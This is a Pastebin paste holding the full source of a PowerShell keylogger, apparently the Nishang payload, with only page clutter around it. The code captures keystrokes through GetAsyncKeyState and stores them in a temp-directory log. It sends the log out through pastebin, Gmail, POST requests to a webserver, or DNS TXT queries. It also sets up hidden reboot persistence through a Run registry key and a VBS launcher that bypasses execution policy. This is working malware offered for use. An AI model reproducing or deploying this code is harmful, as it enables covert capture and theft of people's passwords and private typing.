API tools faq
paste
dev247

keylogger

dev247
Feb 10th, 2017
642
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PowerShell 14.42 KB | None | 0 0
raw download clone embed print report diff
  1. <#
  2. .SYNOPSIS
  3. Nishang Payload which logs keys.
  4.  
  5. .DESCRIPTION
  6. This payload logs a user's keys and writes them to file key.log (I know its bad :|) in user's temp directory.
  7. The keys are than pasted to pastebin|tinypaste|gmail|all as per selection. Saved keys could then be decoded
  8. using the Parse_Key script in nishang.
  9.  
  10. .PARAMETER persist
  11. Use this parameter to achieve reboot persistence. Different methods of persistence with Admin access and normal user access.
  12.  
  13. .PARAMETER ExfilOption
  14. The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
  15.  
  16. .PARAMETER dev_key
  17. The Unique API key provided by pastebin when you register a free account.
  18. Unused for other options
  19.  
  20. .PARAMETER username
  21. Username for the pastebin/gmail account where data would be exfiltrated.
  22. Unused for other options
  23.  
  24. .PARAMETER password
  25. Password for the pastebin/gmail account where data would be exfiltrated.
  26. Unused for other options
  27.  
  28. .PARAMETER URL
  29. The URL of the webserver where POST requests would be sent.
  30.  
  31. .PARAMETER DomainName
  32. The DomainName, whose subdomains would be used for sending TXT queries to.
  33.  
  34. .PARAMETER AuthNS
  35. Authoritative Name Server for the domain specified in DomainName
  36.  
  37. .PARAMETER MagicString
  38. The string which when found at CheckURL will stop the keylogger.
  39.  
  40. .PARAMETER CheckURL
  41. The URL which would contain the MagicString used to stop keylogging.
  42.  
  43. .EXAMPLE
  44. PS > .\Keylogger.ps1
  45. The payload will ask for all required options.
  46.  
  47. .EXAMPLE
  48. PS > .\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis
  49. Use above when using the payload from non-interactive shells and no exfiltration is required.
  50.  
  51. .EXAMPLE
  52. PS > .\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis -exfil -ExfilOption WebServer -URL http://192.168.254.226/data/catch.php
  53. Use above for exfiltration to a webserver which logs POST requests
  54.  
  55.  
  56. .EXAMPLE
  57. PS > .\Keylogger.ps1 -persist
  58.  
  59. Use above for reboot persistence.
  60.  
  61. .LINK
  62. http://labofapenetrationtester.com/
  63. https://github.com/samratashok/nishang
  64. #>
  65.  
  66.     [CmdletBinding(DefaultParameterSetName="noexfil")] Param(
  67.         [Parameter(Parametersetname="exfil")]
  68.         [Switch]
  69.         $persist,
  70.  
  71.         [Parameter(Parametersetname="exfil")]
  72.         [Switch]
  73.         $exfil,
  74.  
  75.         [Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
  76.         [Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
  77.         [String]
  78.         $CheckURL,
  79.  
  80.         [Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
  81.         [Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
  82.         [String]
  83.         $MagicString,
  84.  
  85.         [Parameter(Position = 2, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
  86.         [String]
  87.         $ExfilOption,
  88.  
  89.         [Parameter(Position = 3, Mandatory = $False, Parametersetname="exfil")]
  90.         [String]
  91.         $dev_key = "null",
  92.  
  93.         [Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")]
  94.         [String]
  95.         $username = "null",
  96.  
  97.         [Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")]
  98.         [String]
  99.         $password = "null",
  100.  
  101.         [Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
  102.         [String]
  103.         $URL = "null",
  104.      
  105.         [Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
  106.         [String]
  107.         $DomainName = "null",
  108.  
  109.         [Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
  110.         [String]
  111.         $AuthNS = "null"  
  112.    
  113.     )
  114.  
  115.  
  116.  
  117. $functions =  {
  118.  
  119. function script:Keylogger
  120. {
  121.     Param (
  122.         [Parameter(Position = 0, Mandatory = $True)]
  123.         [String]
  124.         $MagicString,
  125.  
  126.         [Parameter(Position = 1, Mandatory = $True)]
  127.         [String]
  128.         $CheckURL
  129.     )
  130.    
  131.     $signature = @"
  132.    [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  133.    public static extern short GetAsyncKeyState(int virtualKeyCode);
  134. "@
  135.     $getKeyState = Add-Type -memberDefinition $signature -name "Newtype" -namespace newnamespace -passThru
  136.     $check = 0
  137.     while ($true)
  138.     {
  139.         Start-Sleep -Milliseconds 40
  140.         $logged = ""
  141.         $result=""
  142.         $shift_state=""
  143.         $caps_state=""
  144.         for ($char=1;$char -le 254;$char++)
  145.         {
  146.             $vkey = $char
  147.             $logged = $getKeyState::GetAsyncKeyState($vkey)
  148.             if ($logged -eq -32767)
  149.             {
  150.                 if(($vkey -ge 48) -and ($vkey -le 57))
  151.                 {
  152.                     $left_shift_state = $getKeyState::GetAsyncKeyState(160)
  153.                     $right_shift_state = $getKeyState::GetAsyncKeyState(161)
  154.                         if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768))
  155.                         {
  156.                             $result = "S-" + $vkey
  157.                         }
  158.                         else
  159.                         {
  160.                             $result = $vkey
  161.                         }
  162.                     }
  163.                 elseif(($vkey -ge 64) -and ($vkey -le 90))
  164.                 {
  165.                     $left_shift_state = $getKeyState::GetAsyncKeyState(160)
  166.                     $right_shift_state = $getKeyState::GetAsyncKeyState(161)
  167.                     $caps_state = [console]::CapsLock
  168.                     if(!(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768)) -xor $caps_state)
  169.                     {
  170.                         $result = "S-" + $vkey
  171.                     }
  172.                     else
  173.                     {
  174.                         $result = $vkey
  175.                     }
  176.                 }
  177.                 elseif((($vkey -ge 186) -and ($vkey -le 192)) -or (($vkey -ge 219) -and ($vkey -le 222)))
  178.                 {
  179.                     $left_shift_state = $getKeyState::GetAsyncKeyState(160)
  180.                     $right_shift_state = $getKeyState::GetAsyncKeyState(161)
  181.                     if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768))
  182.                     {
  183.                         $result = "S-" + $vkey
  184.                     }
  185.                     else
  186.                     {
  187.                       $result = $vkey
  188.                     }
  189.                 }
  190.                 else
  191.                 {
  192.                     $result = $vkey
  193.                 }
  194.                 $now = Get-Date;
  195.                 $logLine = "$result "
  196.                 $filename = "$env:temp\key.log"
  197.                 Out-File -FilePath $fileName -Append -InputObject "$logLine"
  198.  
  199.             }
  200.         }
  201.         $check++
  202.         if ($check -eq 6000)
  203.         {
  204.             $webclient = New-Object System.Net.WebClient
  205.             $filecontent = $webclient.DownloadString("$CheckURL")
  206.             if ($filecontent -eq $MagicString)
  207.             {
  208.                 break
  209.             }
  210.             $check = 0
  211.         }
  212.     }
  213. }
  214.  
  215.     function Keypaste
  216.     {
  217.         Param (
  218.             [Parameter(Position = 0, Mandatory = $True)]
  219.             [String]
  220.             $ExfilOption,
  221.        
  222.             [Parameter(Position = 1, Mandatory = $True)]
  223.             [String]
  224.             $dev_key,
  225.        
  226.             [Parameter(Position = 2, Mandatory = $True)]
  227.             [String]
  228.             $username,
  229.  
  230.             [Parameter(Position = 3, Mandatory = $True)]
  231.             [String]
  232.             $password,
  233.        
  234.             [Parameter(Position = 4, Mandatory = $True)]
  235.             [String]
  236.             $URL,
  237.  
  238.             [Parameter(Position = 5, Mandatory = $True)]
  239.             [String]
  240.             $AuthNS,
  241.  
  242.             [Parameter(Position = 6, Mandatory = $True)]
  243.             [String]
  244.             $MagicString,
  245.        
  246.             [Parameter(Position = 7, Mandatory = $True)]
  247.             [String]
  248.             $CheckURL
  249.         )
  250.  
  251.         $check = 0
  252.         while($true)
  253.         {
  254.             $read = 0
  255.             Start-Sleep -Seconds 5
  256.             $pastevalue=Get-Content $env:temp\key.log
  257.             $read++
  258.             if ($read -eq 30)
  259.             {
  260.                 Out-File -FilePath $env:temp\key.log -Force -InputObject " "
  261.                 $read = 0
  262.             }
  263.             $now = Get-Date;
  264.             $name = $env:COMPUTERNAME
  265.             $paste_name = $name + " : " + $now.ToUniversalTime().ToString("dd/MM/yyyy HH:mm:ss:fff")
  266.             function post_http($url,$parameters)
  267.             {
  268.                 $http_request = New-Object -ComObject Msxml2.XMLHTTP
  269.                 $http_request.open("POST", $url, $false)
  270.                 $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
  271.                 $http_request.setRequestHeader("Content-length", $parameters.length);
  272.                 $http_request.setRequestHeader("Connection", "close")
  273.                 $http_request.send($parameters)
  274.                 $script:session_key=$http_request.responseText
  275.             }
  276.  
  277.             function Compress-Encode
  278.             {
  279.                 #Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
  280.                 $ms = New-Object IO.MemoryStream
  281.                 $action = [IO.Compression.CompressionMode]::Compress
  282.                 $cs = New-Object IO.Compression.DeflateStream ($ms,$action)
  283.                 $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
  284.                 $pastevalue | ForEach-Object {$sw.WriteLine($_)}
  285.                 $sw.Close()
  286.                 # Base64 encode stream
  287.                 $code = [Convert]::ToBase64String($ms.ToArray())
  288.                 return $code
  289.             }
  290.  
  291.             if ($exfiloption -eq "pastebin")
  292.             {
  293.                 $utfbytes  = [System.Text.Encoding]::UTF8.GetBytes($Data)
  294.                 $pastevalue = [System.Convert]::ToBase64String($utfbytes)
  295.                 post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
  296.                 post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
  297.             }
  298.        
  299.             elseif ($exfiloption -eq "gmail")
  300.             {
  301.                 #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
  302.                 $smtpserver = "smtp.gmail.com"
  303.                 $msg = new-object Net.Mail.MailMessage
  304.                 $smtp = new-object Net.Mail.SmtpClient($smtpServer )
  305.                 $smtp.EnableSsl = $True
  306.                 $smtp.Credentials = New-Object System.Net.NetworkCredential("$username", "$password");
  307.                 $msg.From = "$username@gmail.com"
  308.                 $msg.To.Add("$username@gmail.com")
  309.                 $msg.Subject = $pastename
  310.                 $msg.Body = $pastevalue
  311.                 if ($filename)
  312.                 {
  313.                     $att = new-object Net.Mail.Attachment($filename)
  314.                     $msg.Attachments.Add($att)
  315.                 }
  316.                 $smtp.Send($msg)
  317.             }
  318.  
  319.             elseif ($exfiloption -eq "webserver")
  320.             {
  321.                 $Data = Compress-Encode    
  322.                 post_http $URL $Data
  323.             }
  324.             elseif ($ExfilOption -eq "DNS")
  325.             {
  326.                 $lengthofsubstr = 0
  327.                 $code = Compress-Encode
  328.                 $queries = [int]($code.Length/63)
  329.                 while ($queries -ne 0)
  330.                 {
  331.                     $querystring = $code.Substring($lengthofsubstr,63)
  332.                     Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $ExfilNS"
  333.                     $lengthofsubstr += 63
  334.                     $queries -= 1
  335.                 }
  336.                 $mod = $code.Length%63
  337.                 $query = $code.Substring($code.Length - $mod, $mod)
  338.                 Invoke-Expression "nslookup -querytype=txt $query.$DomainName $ExfilNS"
  339.  
  340.             }
  341.  
  342.             $check++
  343.             if ($check -eq 6000)
  344.             {
  345.                 $check = 0
  346.                 $webclient = New-Object System.Net.WebClient
  347.                 $filecontent = $webclient.DownloadString("$CheckURL")
  348.                 if ($filecontent -eq $MagicString)
  349.                 {
  350.                     break
  351.                 }
  352.             }
  353.         }
  354.     }
  355. }
  356.  
  357.  
  358.  
  359.     $modulename = $script:MyInvocation.MyCommand.Name
  360.     if($persist -eq $True)
  361.     {
  362.         $name = "persist.vbs"
  363.         $options = "start-job -InitializationScript `$functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL)"
  364.         $options2 = "start-job -InitializationScript `$functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)"
  365.         $func = $functions.Tostring()
  366.         Out-File -InputObject '$functions =  {' -Force $env:TEMP\$modulename
  367.         Out-File -InputObject $func -Append $env:TEMP\$modulename
  368.         Out-File -InputObject '}' -Append -NoClobber $env:TEMP\$modulename
  369.         Out-File -InputObject $options -Append -NoClobber $env:TEMP\$modulename
  370.         Out-File -InputObject $options2 -Append -NoClobber $env:TEMP\$modulename
  371.            
  372.         New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
  373.         echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
  374.         echo "objShell.run(`"powershell -noexit -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
  375.  
  376.     }  
  377.  
  378.     else
  379.     {
  380.         if ($exfil -eq $True)
  381.         {
  382.             start-job -InitializationScript $functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL)
  383.             start-job -InitializationScript $functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)
  384.         }
  385.         else
  386.         {
  387.             start-job -InitializationScript $functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)
  388.         }
  389.     }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!